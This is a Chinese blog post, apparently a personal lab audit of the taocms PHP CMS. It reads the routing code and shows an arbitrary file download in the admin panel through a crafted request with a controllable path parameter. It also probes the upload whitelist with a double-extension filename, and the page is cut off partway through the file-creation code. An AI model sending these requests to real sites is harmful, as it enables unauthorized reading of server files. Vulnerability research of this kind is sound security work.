<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/rustymoon/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/rustymoon/images/backbone.jpg">
  <link rel="icon" type="image/png" sizes="16x16" href="/rustymoon/images/backbone.jpg">
  <link rel="mask-icon" href="/rustymoon/images/logo.svg" color="#222">

<link rel="stylesheet" href="/rustymoon/css/main.css">


<link rel="stylesheet" href="/rustymoon/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/rustymoon/lib/pace/pace-theme-minimal.min.css">
  <script src="/rustymoon/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"github.com","root":"/rustymoon/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="不知道怎么回事，本地的taocms审计一本地文档消失了……">
<meta property="og:type" content="article">
<meta property="og:title" content="taocms审计中2">
<meta property="og:url" content="https://github.com/66lueflam144/rustymoon.git/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/index.html">
<meta property="og:site_name" content="RustyMoon">
<meta property="og:description" content="不知道怎么回事，本地的taocms审计一本地文档消失了……">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://github.com/rustymoon/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/taocms1.png">
<meta property="og:image" content="https://github.com/rustymoon/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/taocms%E6%BC%8F%E6%B4%9E.png">
<meta property="og:image" content="https://github.com/rustymoon/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/%E5%88%86%E6%9E%90.png">
<meta property="og:image" content="https://github.com/rustymoon/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/download.png">
<meta property="og:image" content="https://github.com/rustymoon/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/%E4%B8%8A%E4%BC%A0%E7%95%8C%E9%9D%A2.png">
<meta property="og:image" content="https://github.com/rustymoon/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%99%BD%E5%90%8D%E5%8D%95.png">
<meta property="og:image" content="https://github.com/rustymoon/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/ice.png">
<meta property="og:image" content="https://github.com/rustymoon/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/showtables.png">
<meta property="og:image" content="https://github.com/rustymoon/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/showcolumns.png">
<meta property="og:image" content="https://github.com/rustymoon/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F.png">
<meta property="article:published_time" content="2023-11-19T05:10:54.000Z">
<meta property="article:modified_time" content="2023-11-20T13:03:07.021Z">
<meta property="article:author" content="lueflam">
<meta property="article:tag" content="PHP">
<meta property="article:tag" content="代码审计">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://github.com/rustymoon/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/taocms1.png">

<link rel="canonical" href="https://github.com/66lueflam144/rustymoon.git/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

<script>
    (function(){
        if(''){
            if (prompt('请输入查看密码') !== ''){
                alert('密码不正确,请询问主编大大！');
                history.back();
            }
        }
    })();
</script>
  <title>taocms审计中2 | RustyMoon</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/rustymoon/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">RustyMoon</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">66144</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/rustymoon/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/rustymoon/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/rustymoon/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
        <li class="menu-item menu-item-commonweal">

    <a href="/rustymoon/404/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>Commonweal 404</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://github.com/66lueflam144/rustymoon.git/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/rustymoon/images/fa.jpg">
      <meta itemprop="name" content="lueflam">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="RustyMoon">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          taocms审计中2
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2023-11-19 13:10:54" itemprop="dateCreated datePublished" datetime="2023-11-19T13:10:54+08:00">2023-11-19</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2023-11-20 21:03:07" itemprop="dateModified" datetime="2023-11-20T21:03:07+08:00">2023-11-20</time>
              </span>

          <br>
            <span class="post-meta-item" title="Symbols count in article">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">Symbols count in article: </span>
              <span>7.1k</span>
            </span>
            <span class="post-meta-item" title="Reading time">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">Reading time &asymp;</span>
              <span>6 mins.</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>不知道怎么回事，本地的taocms审计一本地文档消失了……</p>
<span id="more"></span>

<p><font size="1">原本是打算继续按照文档的顺序来读的，但是实在看得有点艰难，所以就从GUI看起。</font></p>
<hr>
<h1 id="download-init"><a href="#download-init" class="headerlink" title="download &amp; init"></a>download &amp; init</h1><p>环境：用的是windows 11 + phpstudy_pro，Nginx1.15.11，MySQL5.7.26</p>
<ul>
<li>这里需要注意的是要在配置的时候创建一个数据库，后面install用得到。</li>
<li>phpstudy_pro的数据库端口默认3306（其实在数据库配置中也可以看到）。</li>
<li>根目录要到你下载的那个cms源码文件夹，不然可能访问不了（别问我怎么知道的QAQ）</li>
</ul>
<p>看到这个界面就安装成功了:</p>
<img src="/rustymoon/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/taocms1.png" class title="taocms">

<p>扫描一下：</p>
<img src="/rustymoon/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/taocms%E6%BC%8F%E6%B4%9E.png" class title="漏洞">

<hr>
<hr>
<h1 id="路由："><a href="#路由：" class="headerlink" title="路由："></a>路由：</h1><blockquote>
<p>taocms 的路由</p>
</blockquote>
<p>前台功能点路由:<code>wap/api.php</code><br>后台功能点路由：<code>admin/admin.php</code></p>
<h2 id="前台"><a href="#前台" class="headerlink" title="前台"></a>前台</h2><pre class="line-numbers language-php" data-language="php"><code class="language-php">//api.php
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token function">session_start</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">include</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'config.php'</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//包含config.php调用其所含配置</span>
<span class="token keyword">include</span><span class="token punctuation">(</span><span class="token constant">SYS_ROOT</span><span class="token operator">.</span><span class="token constant">INC</span><span class="token operator">.</span><span class="token string single-quoted-string">'common.php'</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//同上</span>
<span class="token variable">$ctrl</span><span class="token operator">=</span><span class="token variable">$_REQUEST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'ctrl'</span><span class="token punctuation">]</span><span class="token punctuation">;</span><span class="token comment">//request方法传入参数ctrl，$ctrl接收</span>
<span class="token variable">$action</span><span class="token operator">=</span><span class="token variable">$_REQUEST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'action'</span><span class="token punctuation">]</span><span class="token punctuation">;</span><span class="token comment">//同上</span>
<span class="token variable">$m</span><span class="token operator">=</span><span class="token function">ucfirst</span><span class="token punctuation">(</span><span class="token variable">$action</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//将字符串第一个字符设为大写，为后面类名实例化做准备——类首字母均为大写</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token operator">!</span><span class="token function">in_array</span><span class="token punctuation">(</span><span class="token variable">$m</span><span class="token punctuation">,</span><span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'Api'</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'Comment'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token keyword">die</span><span class="token punctuation">;</span><span class="token comment">//判断是否存在Api和Comment，存在就die</span>
<span class="token variable">$model</span><span class="token operator">=</span><span class="token keyword">new</span> <span class="token variable">$m</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//类名实例化</span>
<span class="token comment">//这个实例中$ctrl存在，就在实例基础上调用$ctrl()</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">method_exists</span><span class="token punctuation">(</span><span class="token variable">$m</span><span class="token punctuation">,</span><span class="token variable">$ctrl</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
	<span class="token variable">$model</span><span class="token operator">-></span><span class="token variable">$ctrl</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token comment">//common.php部分</span>
<span class="token keyword">function</span> <span class="token function-definition function">__autoload</span><span class="token punctuation">(</span><span class="token variable">$name</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
	<span class="token variable">$path</span><span class="token operator">=</span><span class="token constant">SYS_ROOT</span><span class="token operator">.</span><span class="token string single-quoted-string">'include/Model/'</span><span class="token operator">.</span><span class="token function">ucfirst</span><span class="token punctuation">(</span><span class="token variable">$name</span><span class="token punctuation">)</span><span class="token operator">.</span> <span class="token string single-quoted-string">'.php'</span><span class="token punctuation">;</span><span class="token comment">//调用include/Model中所有文件功能代码</span>
	<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">file_exists</span><span class="token punctuation">(</span><span class="token variable">$path</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
		 <span class="token keyword">include</span> <span class="token variable">$path</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span><span class="token keyword">else</span><span class="token punctuation">&#123;</span>
		<span class="token keyword">return</span> <span class="token constant boolean">false</span><span class="token punctuation">;</span>
	<span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="后台"><a href="#后台" class="headerlink" title="后台"></a>后台</h2><pre class="line-numbers language-php" data-language="php"><code class="language-php">//admin.php
//与前台一个道理
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token function">session_start</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//创建新session</span>
<span class="token keyword">include</span> <span class="token string double-quoted-string">"../config.php"</span><span class="token punctuation">;</span>
<span class="token keyword">include</span> <span class="token string double-quoted-string">"../include/common.php"</span><span class="token punctuation">;</span>
<span class="token variable">$action</span><span class="token operator">=</span><span class="token variable">$_REQUEST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'action'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$ctrl</span><span class="token operator">=</span><span class="token variable">$_REQUEST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'ctrl'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$id</span><span class="token operator">=</span><span class="token punctuation">(</span><span class="token keyword type-casting">array</span><span class="token punctuation">)</span><span class="token variable">$_REQUEST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'id'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>

<span class="token comment">//增加校验</span>
<span class="token comment">//请登录</span>

<span class="token comment">//对传入参数的校验</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token operator">!</span><span class="token class-name static-context">Base</span><span class="token operator">::</span><span class="token function">checkadmin</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">&amp;&amp;</span><span class="token variable">$ctrl</span><span class="token operator">!=</span><span class="token string single-quoted-string">'login'</span><span class="token operator">&amp;&amp;</span><span class="token variable">$ctrl</span><span class="token operator">!=</span><span class="token string single-quoted-string">'checkUser'</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
	<span class="token class-name static-context">Base</span><span class="token operator">::</span><span class="token function">showmessage</span><span class="token punctuation">(</span><span class="token string single-quoted-string">''</span><span class="token punctuation">,</span><span class="token string double-quoted-string">"index.php?action=login"</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token variable">$referInfo</span><span class="token operator">=</span><span class="token function">parse_url</span><span class="token punctuation">(</span><span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'HTTP_REFERER'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$referHost</span><span class="token operator">=</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$referInfo</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'port'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token operator">?</span><span class="token string double-quoted-string">"<span class="token interpolation"><span class="token punctuation">&#123;</span><span class="token variable">$referInfo</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'host'</span><span class="token punctuation">]</span><span class="token punctuation">&#125;</span></span>:<span class="token interpolation"><span class="token punctuation">&#123;</span><span class="token variable">$referInfo</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'port'</span><span class="token punctuation">]</span><span class="token punctuation">&#125;</span></span>"</span><span class="token punctuation">:</span><span class="token variable">$referInfo</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'host'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>

<span class="token comment">//对host和ctrl的校验</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$referHost</span> <span class="token operator">!==</span> <span class="token variable">$_SERVER</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'HTTP_HOST'</span><span class="token punctuation">]</span><span class="token operator">&amp;&amp;</span><span class="token variable">$ctrl</span><span class="token operator">!=</span><span class="token string single-quoted-string">'login'</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
    <span class="token class-name static-context">Base</span><span class="token operator">::</span><span class="token function">showmessage</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'refer error'</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'admin.php?action=frame&amp;ctrl=logout'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token comment">//如果有$action，就进行实例化便于后续调用</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token class-name static-context">Base</span><span class="token operator">::</span><span class="token function">catauth</span><span class="token punctuation">(</span><span class="token variable">$action</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
	<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">class_exists</span><span class="token punctuation">(</span><span class="token variable">$action</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
		<span class="token variable">$model</span><span class="token operator">=</span><span class="token keyword">new</span> <span class="token variable">$action</span><span class="token punctuation">(</span><span class="token variable">$action</span><span class="token punctuation">,</span><span class="token variable">$id</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">method_exists</span><span class="token punctuation">(</span><span class="token variable">$action</span><span class="token punctuation">,</span><span class="token variable">$ctrl</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
			<span class="token variable">$model</span><span class="token operator">-></span><span class="token variable">$ctrl</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token punctuation">&#125;</span>
	<span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>

<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<hr>
<hr>
<h1 id="Model"><a href="#Model" class="headerlink" title="Model&#x2F;"></a>Model&#x2F;</h1><h2 id="任意文件下载"><a href="#任意文件下载" class="headerlink" title="任意文件下载"></a>任意文件下载</h2><p>前面在文件上传的部分提到过它，但没有来得及更新文档一，文档一就离我而去了。</p>
<br>

<p>根据前面的分析:</p>
<img src="/rustymoon/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/%E5%88%86%E6%9E%90.png" class title="分析">

<table><tr><td bgcolor="yellow"> <b>action</b> 传入需要实例化的类名， <b>ctrl</b> 传入需要调用的方法。</td></tr></table>

<p>根据file.php提供的线索可以知道，它提供功能给 <strong>文件管理</strong> ,点击已存在的文件：</p>
<pre class="line-numbers language-http" data-language="http"><code class="language-http">//api.php
<span class="token request-line"><span class="token method property">GET</span> <span class="token request-target url">/admin/admin.php?action=file&amp;ctrl=edit&amp;path=api.php</span> <span class="token http-version property">HTTP/1.1</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<br>
<br>

<p>随便新建文件 <code>fly.php</code>，抓包后得到： </p>
<pre class="line-numbers language-http" data-language="http"><code class="language-http"><span class="token request-line"><span class="token method property">GET</span> <span class="token request-target url">/admin/admin.php?path=&amp;action=file&amp;ctrl=create&amp;isdir=0&amp;name=fly.php&amp;fbtn=%E6%96%B0%E5%BB%BA%E6%96%87%E4%BB%B6</span> <span class="token http-version property">HTTP/1.1</span></span>
<span class="token header"><span class="token header-name keyword">Host</span><span class="token punctuation">:</span> <span class="token header-value">taocms</span></span>

//找了一下，fbtn出现在managerfile.php中，作为input name 和 id<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>由上面两个例子可以看到，就如我们所说，path可控所以</p>
<p>修改path再调用存在问题的<code>function download()</code>：</p>
<pre class="line-numbers language-http" data-language="http"><code class="language-http">
<span class="token request-line"><span class="token method property">GET</span> <span class="token request-target url">/admin/admin.php?path=/rss.php&amp;action=file&amp;ctrl=download</span> <span class="token http-version property">HTTP/1.1</span></span>
<span class="token header"><span class="token header-name keyword">Host</span><span class="token punctuation">:</span> <span class="token header-value">taocms</span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>得到</p>
<img src="/rustymoon/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/download.png" class title="download">

<p>做到了<table><tr><td bgcolor="yellow">任意文件下载。</td></tr></table></p>
<hr>
<hr>
<h2 id="任意文件上传"><a href="#任意文件上传" class="headerlink" title="任意文件上传"></a>任意文件上传</h2><h3 id="upload？"><a href="#upload？" class="headerlink" title="upload？"></a>upload？</h3><p>在管理界面到处找找，于是找到<strong>上传</strong>这个东西，打开:</p>
<img src="/rustymoon/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/%E4%B8%8A%E4%BC%A0%E7%95%8C%E9%9D%A2.png" class title="上传">


<p>用php文件测试一下</p>
<img src="/rustymoon/2023/11/19/taocms%E5%AE%A1%E8%AE%A1%E4%B8%AD2/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%99%BD%E5%90%8D%E5%8D%95.png" class title="上传">


<p>as you can see:</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token comment">//upload.php部分</span>
<span class="token keyword">function</span> <span class="token function-definition function">upload</span><span class="token punctuation">(</span><span class="token variable">$inputname</span><span class="token punctuation">,</span><span class="token variable">$attachdir</span><span class="token operator">=</span><span class="token string single-quoted-string">'pictures/'</span><span class="token punctuation">,</span><span class="token variable">$urldir</span><span class="token operator">=</span><span class="token string double-quoted-string">""</span><span class="token punctuation">,</span><span class="token variable">$dirtype</span><span class="token operator">=</span><span class="token number">1</span><span class="token punctuation">,</span><span class="token variable">$maxattachsize</span><span class="token operator">=</span><span class="token number">10097152</span><span class="token punctuation">)</span>
	<span class="token punctuation">&#123;</span>
		<span class="token variable">$upext</span><span class="token operator">=</span><span class="token string single-quoted-string">'txt,rar,zip,jpg,jpeg,gif,png,swf,wmv,avi,wma,mp3,mid,jar,jad,exe,html,htm,css,js,doc'</span><span class="token punctuation">;</span><span class="token comment">//上传扩展名</span>
		<span class="token variable">$err</span> <span class="token operator">=</span> <span class="token string double-quoted-string">""</span><span class="token punctuation">;</span>
		<span class="token variable">$msg</span> <span class="token operator">=</span> <span class="token string double-quoted-string">""</span><span class="token punctuation">;</span>
		<span class="token variable">$upfile</span><span class="token operator">=</span><span class="token variable">$_FILES</span><span class="token punctuation">[</span><span class="token variable">$inputname</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
		<span class="token variable">$fileinfo</span><span class="token operator">=</span><span class="token function">pathinfo</span><span class="token punctuation">(</span><span class="token variable">$upfile</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'name'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//通过pathinfo()获取文件扩展名</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>白名单很难绕过</p>
<p>而<code>pathinfo()</code></p>
<pre class="line-numbers language-txt" data-language="txt"><code class="language-txt">name = example.png
Array
(
    [dirname] => .
    [basename] => example.jpg
    [extension] => jpg
    [filename] => example
)

name = test.php.png
Array
(
    [dirname] => .
    [basename] => test.php.png
    [extension] => png
    [filename] => test.php
)<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>或许文件包含？不过在那之前先看另一个界面， <strong>新建文件&#x2F;文件夹</strong></p>
<h3 id="create？"><a href="#create？" class="headerlink" title="create？"></a>create？</h3><pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token comment">//File.php部分</span>
<span class="token keyword">function</span> <span class="token function-definition function">create</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
		<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token operator">!</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'name'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
			<span class="token class-name static-context">Base</span><span class="token operator">::</span><span class="token function">showmessage</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'请填写文件名/文件夹名'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token punctuation">&#125;</span>
		<span class="token variable">$file</span><span class="token operator">=</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">realpath</span><span class="token operator">.</span><span class="token string single-quoted-string">'/'</span><span class="token operator">.</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'name'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
		<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'isdir'</span><span class="token punctuation">]</span><span class="token operator">==</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
			<span class="token function">mkdir</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
			<span class="token variable">$str</span><span class="token operator">=</span><span class="token string single-quoted-string">'目录'</span><span class="token punctuation">;</span>
		<span class="token punctuation">&#125;</span><span class="token keyword">else</span><span class="token punctuation">&#123;</span>
			<span class="token function">fopen</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'a'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
			<span class="token variable">$str</span><span class="token operator">=</span><span class="token string single-quoted-string">'文件'</span><span class="token punctuation">;</span>
		<span class="token punctuation">&#125;</span>
		<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token operator">!</span><span class="token function">is_writable</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token class-name static-context">Base</span><span class="token operator">::</span><span class="token function">showmessage</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'新建'</span><span class="token operator">.</span><span class="token variable">$str</span><span class="token operator">.</span><span class="token string single-quoted-string">'失败'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token variable">$info</span><span class="token operator">=</span><span class="token function">pathinfo</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">path</span><span class="token operator">.</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'name'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
